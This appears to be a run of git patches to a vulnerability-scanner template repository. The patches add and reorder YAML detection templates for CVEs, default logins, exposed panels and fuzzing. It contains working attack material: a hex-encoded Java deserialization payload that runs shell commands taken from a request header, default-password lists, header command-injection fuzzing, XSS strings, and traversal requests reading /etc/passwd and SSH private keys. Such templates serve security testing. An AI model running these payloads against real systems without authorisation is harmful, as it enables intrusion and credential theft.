B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D + payloads: + command: + - "systeminfo" # Windows + - "lsb_release -a" # Linux + attack: sniper + matchers-condition: and matchers: - type: regex diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 30b1006bc0..1214279169 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -7,7 +7,23 @@ info: tags: aem,default-login,fuzz requests: - - payloads: + - raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/plain, */*; q=0.01 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Content-Length: 67 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + Connection: close + + _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true + + payloads: rr_username: - admin @@ -35,22 +51,6 @@ requests: attack: pitchfork # Available options: sniper, pitchfork and clusterbomb - raw: - - | - POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/plain, */*; q=0.01 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Content-Length: 67 - Origin: {{BaseURL}} - Referer: {{BaseURL}}/libs/granite/core/content/login.html - Connection: close - - _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true - matchers-condition: and matchers: - type: status diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml index 12d11eae20..33dfdc240c 100644 --- a/default-logins/apache/tomcat-manager-default.yaml +++ b/default-logins/apache/tomcat-manager-default.yaml @@ -7,7 +7,13 @@ info: requests: - - payloads: + - raw: + - | + GET /manager/html HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: username: - tomcat - admin @@ -46,16 +52,6 @@ requests: attack: pitchfork # Available options: sniper, pitchfork and clusterbomb - raw: - # Request with simple param and header manipulation with DSL functions - - | - GET /manager/html HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 - Accept-Language: en-US,en;q=0.9 - Connection: close - matchers-condition: and matchers: - type: status diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml index 49b317b44e..8c9f3a9649 100644 --- a/default-logins/gitlab/gitlab-weak-login.yaml +++ b/default-logins/gitlab/gitlab-weak-login.yaml @@ -10,19 +10,7 @@ info: requests: - - payloads: - - gitlab_password: - - 12345 - - 123456789 - gitlab_user: - - 1234 - - admin - # Enumerate valid user. - - attack: clusterbomb - - raw: + - raw: - | POST /oauth/token HTTP/1.1 Host: {{Hostname}} @@ -35,6 +23,17 @@ requests: {"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"} + payloads: + + gitlab_password: + - 12345 + - 123456789 + gitlab_user: + - 1234 + - admin + + attack: clusterbomb + matchers-condition: and matchers: - type: status diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml index 202a386634..844a2403f9 100644 --- a/default-logins/grafana/grafana-default-credential.yaml +++ b/default-logins/grafana/grafana-default-credential.yaml @@ -12,23 +12,7 @@ info: requests: - - payloads: - - # grafana_username: - # - admin - - grafana_password: - - prom-operator - - admin - - # Added default grafana and prometheus user. - # Source:- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - - attack: sniper - - # Available types: sniper, pitchfork and clusterbomb - - raw: + - raw: - | POST /login HTTP/1.1 Host: {{Hostname}} @@ -41,7 +25,13 @@ requests: {"user":"admin","password":"§grafana_password§"} - # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin + + payloads: + grafana_password: + - prom-operator + - admin + + attack: sniper matchers-condition: and matchers: diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml index df0060a22f..71b81d2b60 100644 --- a/fuzzing/adminer-panel-fuzz.yaml +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -13,20 +13,19 @@ info: requests: - - payloads: - path: helpers/wordlists/adminer-paths.txt - - attack: sniper - threads: 50 - - raw: + - raw: - | GET {{path}} HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} + payloads: + path: helpers/wordlists/adminer-paths.txt + + attack: sniper + threads: 50 + matchers-condition: and matchers: diff --git a/fuzzing/header-command-injection.yaml b/fuzzing/header-command-injection.yaml index de1e04b0e9..c0aa1042cf 100644 --- a/fuzzing/header-command-injection.yaml +++ b/fuzzing/header-command-injection.yaml @@ -8,20 +8,19 @@ info: tags: fuzz,rce requests: - - payloads: - header: helpers/payloads/request-headers.txt - payload: helpers/payloads/command-injection.txt - raw: + - raw: - | GET /?§header§ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 §header§: §payload§ - Connection: close + payloads: + header: helpers/payloads/request-headers.txt + payload: helpers/payloads/command-injection.txt attack: clusterbomb redirects: true + matchers-condition: or matchers: - type: word diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml index d5406502f5..2e23ac3527 100644 --- a/fuzzing/mdb-database-file.yaml +++ b/fuzzing/mdb-database-file.yaml @@ -8,13 +8,8 @@ info: reference: https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.html requests: - - payloads: - mdbPaths: helpers/wordlists/mdb-paths.txt - attack: sniper - threads: 50 - - raw: + - raw: - | GET {{mdbPaths}} HTTP/1.1 Host: {{Hostname}} @@ -22,7 +17,13 @@ requests: Accept-Language: en-US,en;q=0.9 Connection: close + payloads: + mdbPaths: helpers/wordlists/mdb-paths.txt + + attack: sniper + threads: 50 max-size: 500 # Size in bytes - Max Size to read from server response + matchers-condition: and matchers: - type: binary diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml index 434b666a00..bc34994801 100644 --- a/fuzzing/prestashop-module-fuzz.yaml +++ b/fuzzing/prestashop-module-fuzz.yaml @@ -7,13 +7,7 @@ info: requests: - - payloads: - path: helpers/wordlists/prestashop-modules.txt - - attack: sniper - threads: 50 - - raw: + - raw: - | GET /modules/{{path}}/config.xml HTTP/1.1 Host: {{Hostname}} @@ -21,6 +15,11 @@ requests: Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} + payloads: + path: helpers/wordlists/prestashop-modules.txt + attack: sniper + threads: 50 + matchers-condition: and matchers: - type: word diff --git a/fuzzing/wordpress-plugins-detect.yaml b/fuzzing/wordpress-plugins-detect.yaml index 6653e7fd0c..8ac220d66a 100644 --- a/fuzzing/wordpress-plugins-detect.yaml +++ b/fuzzing/wordpress-plugins-detect.yaml @@ -6,19 +6,19 @@ info: tags: fuzz requests: - - payloads: - pluginSlug: helpers/wordlists/wordpress-plugins.txt - attack: sniper - threads: 50 - - raw: + - raw: - | GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} + payloads: + pluginSlug: helpers/wordlists/wordpress-plugins.txt + attack: sniper + threads: 50 redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: status diff --git a/fuzzing/wordpress-themes-detect.yaml b/fuzzing/wordpress-themes-detect.yaml index 48f331a039..5679a9f65a 100644 --- a/fuzzing/wordpress-themes-detect.yaml +++ b/fuzzing/wordpress-themes-detect.yaml @@ -6,19 +6,19 @@ info: tags: fuzz requests: - - payloads: - themeSlug: helpers/wordlists/wordpress-themes.txt - attack: sniper - threads: 50 - - raw: + - raw: - | GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} + payloads: + themeSlug: helpers/wordlists/wordpress-themes.txt + attack: sniper + threads: 50 redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: status diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml index cfd9fc28aa..8e16183217 100644 --- a/miscellaneous/ntlm-directories.yaml +++ b/miscellaneous/ntlm-directories.yaml @@ -8,7 +8,14 @@ info: reference: https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 requests: - - payloads: + + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= + + payloads: path: - / - /abs/ @@ -60,12 +67,6 @@ requests: attack: sniper threads: 50 - raw: - - | - GET {{path}} HTTP/1.1 - Host: {{Hostname}} - Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= - matchers-condition: and matchers: - type: dsl diff --git a/network/ftp-default-creds.yaml b/network/ftp-default-creds.yaml index 18bef48e05..7b1e8b82c9 100644 --- a/network/ftp-default-creds.yaml +++ b/network/ftp-default-creds.yaml @@ -7,7 +7,14 @@ info: tags: network,ftp,default-login network: - - payloads: + + - inputs: + - data: "USER {{username}}\r\nPASS {{password}}\r\n" + host: + - "{{Hostname}}:21" + - "{{Hostname}}" + + payloads: username: - admin - root @@ -23,10 +30,7 @@ network: - stingray attack: clusterbomb - inputs: - - data: "USER {{username}}\r\nPASS {{password}}\r\n" - host: - - "{{Hostname}}:21" + matchers: - type: word words: diff --git a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml index f961cad2cb..70867414e7 100644 --- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml +++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml @@ -5,23 +5,21 @@ info: name: GitLab - User Enumeration severity: info tags: gitlab,enumeration - - # Username source - https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt + reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt requests: - - payloads: - user: helpers/wordlists/user-list.txt - attack: sniper - threads: 50 - raw: + - raw: - | GET /users/{{user}}/exists HTTP/1.1 Host: {{Hostname}} - Accept-Language: en-US,en;q=0.9 Accept: application/json, text/plain, */* Referer: {{BaseURL}} - Connection: keep-alive + + payloads: + user: helpers/wordlists/user-list.txt + attack: sniper + threads: 50 matchers-condition: and matchers: diff --git a/vulnerabilities/gitlab/gitlab-user-open-api.yaml b/vulnerabilities/gitlab/gitlab-user-open-api.yaml index 5937c26ea4..e9a99ab5a4 100644 --- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml +++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml @@ -8,19 +8,19 @@ info: reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 requests: - - payloads: - uid: helpers/wordlists/numbers.txt - attack: sniper - threads: 50 - raw: + + - raw: - | GET /api/v4/users/{{uid}} HTTP/1.1 Host: {{Hostname}} - Accept-Language: en-US,en;q=0.9 Accept: application/json, text/plain, */* Referer: {{BaseURL}} - Connection: keep-alive + + payloads: + uid: helpers/wordlists/numbers.txt + attack: sniper + threads: 50 matchers-condition: and matchers: diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml index c990d11794..6f9c1901c4 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml @@ -10,20 +10,19 @@ info: tags: vmware,lfi requests: - - payloads: + + - raw: + - | + GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1 + Host: {{Hostname}} + + payloads: path: - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 attack: sniper - raw: - - | - GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - Accept: */* - Accept-Language: en - Connection: close + matchers-condition: and matchers: - type: regex From 5e24f6400775999e235922612916f05609a7bb6a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 22 Aug 2021 23:40:10 +0530 Subject: [PATCH 1788/4083] Delete npm-techdocs-common.yaml --- .../other/npm-techdocs-common.yaml | 25 ------------------- 1 file changed, 25 deletions(-) delete mode 100644 vulnerabilities/other/npm-techdocs-common.yaml diff --git a/vulnerabilities/other/npm-techdocs-common.yaml b/vulnerabilities/other/npm-techdocs-common.yaml deleted file mode 100644 index 25df5e032b..0000000000 --- a/vulnerabilities/other/npm-techdocs-common.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: npm-techdocs-common - -info: - name: NPM - techdocs-common - Directory Traversal - author: dhiyaneshDk - severity: high - tags: config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa" - - matchers-condition: and - matchers: - - type: word - words: - - "BEGIN OPENSSH PRIVATE KEY" - - "BEGIN PRIVATE KEY" - - "BEGIN RSA PRIVATE KEY" - condition: or - - - type: status - status: - - 200 From f4a1de8225c95dd6a3fc9a1d4032f2535f504091 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 23 Aug 2021 00:29:23 +0530 Subject: [PATCH 1789/4083] more strict matchers --- cves/2007/CVE-2007-0885.yaml | 4 ++-- cves/2009/CVE-2009-1872.yaml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2007/CVE-2007-0885.yaml b/cves/2007/CVE-2007-0885.yaml index 41811f9123..b237557509 100644 --- a/cves/2007/CVE-2007-0885.yaml +++ b/cves/2007/CVE-2007-0885.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\">" + - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e' matchers-condition: and matchers: - type: word words: - - "\">" + - '">' - type: status status: diff --git a/cves/2009/CVE-2009-1872.yaml b/cves/2009/CVE-2009-1872.yaml index f2d3abffa1..c46de586d4 100644 --- a/cves/2009/CVE-2009-1872.yaml +++ b/cves/2009/CVE-2009-1872.yaml @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?>' + - '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' matchers-condition: and matchers: From 67f3cde532d64158ea581e5dacac0308a2386625 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 23 Aug 2021 01:33:49 +0530 Subject: [PATCH 1790/4083] Added Exposed Android Debug Bridge detection --- network/expsoed-adb.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 network/expsoed-adb.yaml diff --git a/network/expsoed-adb.yaml b/network/expsoed-adb.yaml new file mode 100644 index 0000000000..a2d6941cd8 --- /dev/null +++ b/network/expsoed-adb.yaml @@ -0,0 +1,27 @@ +id: expsoed-adb + +info: + name: Exposed Android Debug Bridge + author: pdteam,pikpikcu + severity: high + tags: network,adb + reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge + +network: + - inputs: + - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint + type: hex + + - data: "686f73743a3a66656174757265733d7368656c6c5f76322c636d642c737461745f76322c6c735f76322c66697865645f707573685f6d6b6469722c617065782c6162622c66697865645f707573685f73796d6c696e6b5f74696d657374616d702c6162625f657865632c72656d6f756e745f7368656c6c2c747261636b5f6170702c73656e64726563765f76322c73656e64726563765f76325f62726f746c692c73656e64726563765f76325f6c7a342c73656e64726563765f76325f7a7374642c73656e64726563765f76325f6472795f72756e5f73656e642c6f70656e73637265656e5f6d646e73" + type: hex + + host: + - "{{Hostname}}" + - "{{Hostname}}:5555" + + matchers: + - type: word + words: + - "device" + - "product" + condition: and From c011ab270f9d872d2ff57f60e35341712974273c Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 23 Aug 2021 01:35:04 +0530 Subject: [PATCH 1791/4083] some rce tags --- network/expsoed-adb.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/expsoed-adb.yaml b/network/expsoed-adb.yaml index a2d6941cd8..b898ee339f 100644 --- a/network/expsoed-adb.yaml +++ b/network/expsoed-adb.yaml @@ -4,7 +4,7 @@ info: name: Exposed Android Debug Bridge author: pdteam,pikpikcu severity: high - tags: network,adb + tags: network,adb,rce reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge network: From f8efe72b2009e0be53b33e489cc9d101f4bc5e5f Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sun, 22 Aug 2021 17:07:10 -0500 Subject: [PATCH 1792/4083] Create hp-ilo-5.yaml --- exposed-panels/hp-ilo-5.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposed-panels/hp-ilo-5.yaml diff --git a/exposed-panels/hp-ilo-5.yaml b/exposed-panels/hp-ilo-5.yaml new file mode 100644 index 0000000000..e11323e7fb --- /dev/null +++ b/exposed-panels/hp-ilo-5.yaml @@ -0,0 +1,32 @@ +id: hp-ilo-5 + +info: + name: Detects Hewlett Packard iLo 5 + author: geeknik + severity: info + reference: https://www.hpe.com/us/en/servers/integrated-lights-out-ilo.html + tags: hp,ilo + +requests: + - method: GET + path: + - "{{BaseURL}}/html/login.html" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "titleHeading>iLO 5" + - "titleFwver>Firmware" + - "2002-2018 Hewlett Packard Enterprise Development LP" + condition: and + + - type: word + part: header + words: + - "text/html" From 906d9fd5afbf2e0afb51d4ea58261548fb3ff7c4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 23 Aug 2021 07:03:54 +0700 Subject: [PATCH 1793/4083] Create CVE-2018-6008.yaml --- cves/2018/CVE-2018-6008.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-6008.yaml diff --git a/cves/2018/CVE-2018-6008.yaml b/cves/2018/CVE-2018-6008.yaml new file mode 100644 index 0000000000..e2f44990c0 --- /dev/null +++ b/cves/2018/CVE-2018-6008.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-6008 + +info: + name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download + author: daffainfo + severity: high + description: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter. + reference: | + - https://www.exploit-db.com/exploits/43913 + - https://www.cvedetails.com/cve/CVE-2018-6008 + tags: cve,cve2018,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 60d262ace8b306fe46356b009fd69cadd04baa7c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 23 Aug 2021 07:23:19 +0700 Subject: [PATCH 1794/4083] Create CVE-2010-1314.yaml --- cves/2010/CVE-2010-1314.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1314.yaml diff --git a/cves/2010/CVE-2010-1314.yaml b/cves/2010/CVE-2010-1314.yaml new file mode 100644 index 0000000000..2fba0d607c --- /dev/null +++ b/cves/2010/CVE-2010-1314.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1314 + +info: + name: Joomla! Component Highslide 1.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12086 + - https://www.cvedetails.com/cve/CVE-2010-1314 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From be3d5c9d084f4cf9d734f73b8b54df437e08c5fd Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 23 Aug 2021 11:30:16 +0700 Subject: [PATCH 1795/4083] Add CVE-2020-29453 --- cves/2020/CVE-2020-29453.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2020/CVE-2020-29453.yaml diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml new file mode 100644 index 0000000000..d1f0f8ec5a --- /dev/null +++ b/cves/2020/CVE-2020-29453.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-29453 + +info: + name: Pre-Auth Limited Arbitrary File Read in Jira Server + author: dwisiswant0 + severity: medium + description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. + reference: https://jira.atlassian.com/browse/JRASERVER-72014 + tags: cve,cve2020,atlassian,jira,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" + - "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - com.atlassian.jira + part: body \ No newline at end of file From d9e859953c345899a7eda48dce07627d9bc29533 Mon Sep 17 00:00:00 2001 From: Evolutionsec <30623287+ks6274@users.noreply.github.com> Date: Mon, 23 Aug 2021 12:52:33 +0530 Subject: [PATCH 1796/4083] updates to the phpmyadmin panel detection script Added another possible path URL for detection phpmyadmin panel and matching condition along with possile title to be detected for confirmation of the exposed phpmyadmin panel. --- exposed-panels/phpmyadmin-panel.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/exposed-panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml index 70390d3b8f..256bd15fd4 100644 --- a/exposed-panels/phpmyadmin-panel.yaml +++ b/exposed-panels/phpmyadmin-panel.yaml @@ -20,14 +20,17 @@ requests: - "{{BaseURL}}/typo3/phpmyadmin/" - "{{BaseURL}}/web/phpmyadmin/" - "{{BaseURL}}/xampp/phpmyadmin/" + - "{{BaseURL}}/phpMyAdmin/" #add another possible path for phpmyadmin panel detection + matchers-condition: or #add matching condition matchers: - type: word words: - "phpMyAdmin" + - "phpMyAdmin " #result pattern with a trailing whitespace. extractors: - type: regex part: body group: 1 regex: - - 'v=([a-z0-9-._]+)' \ No newline at end of file + - 'v=([a-z0-9-._]+)' From 3af12370afea69d7bcd2fd65ab8ce0b841cd0fdf Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 23 Aug 2021 14:24:04 +0530 Subject: [PATCH 1797/4083] Update phpmyadmin-panel.yaml --- exposed-panels/phpmyadmin-panel.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/exposed-panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml index 256bd15fd4..51499eeae1 100644 --- a/exposed-panels/phpmyadmin-panel.yaml +++ b/exposed-panels/phpmyadmin-panel.yaml @@ -20,13 +20,12 @@ requests: - "{{BaseURL}}/typo3/phpmyadmin/" - "{{BaseURL}}/web/phpmyadmin/" - "{{BaseURL}}/xampp/phpmyadmin/" - - "{{BaseURL}}/phpMyAdmin/" #add another possible path for phpmyadmin panel detection - matchers-condition: or #add matching condition + - "{{BaseURL}}/phpMyAdmin/" + matchers: - type: word words: - - "phpMyAdmin" - - "phpMyAdmin " #result pattern with a trailing whitespace. + - "phpMyAdmin" extractors: - type: regex From 0118467278e1f1925c2d7fafa3c4cf472cc2d2f1 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 14:37:03 +0530 Subject: [PATCH 1798/4083] marking as critical for rce --- network/expsoed-adb.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/expsoed-adb.yaml b/network/expsoed-adb.yaml index b898ee339f..cce28b6272 100644 --- a/network/expsoed-adb.yaml +++ b/network/expsoed-adb.yaml @@ -3,7 +3,7 @@ id: expsoed-adb info: name: Exposed Android Debug Bridge author: pdteam,pikpikcu - severity: high + severity: critical tags: network,adb,rce reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge From 451e938d460aa187b6a479db4cf1885a66403e02 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 14:54:04 +0530 Subject: [PATCH 1799/4083] misc changes --- cves/2019/CVE-2019-8442.yaml | 15 ++++++--------- cves/2020/CVE-2020-29453.yaml | 4 +++- 2 files changed, 9 insertions(+), 10 deletions(-) diff --git a/cves/2019/CVE-2019-8442.yaml b/cves/2019/CVE-2019-8442.yaml index c1400479b9..74622a2fa8 100644 --- a/cves/2019/CVE-2019-8442.yaml +++ b/cves/2019/CVE-2019-8442.yaml @@ -8,21 +8,18 @@ info: tags: cve,cve2019,atlassian,jira,lfi requests: - - raw: - - | - GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: deflate + - method: GET + path: + - 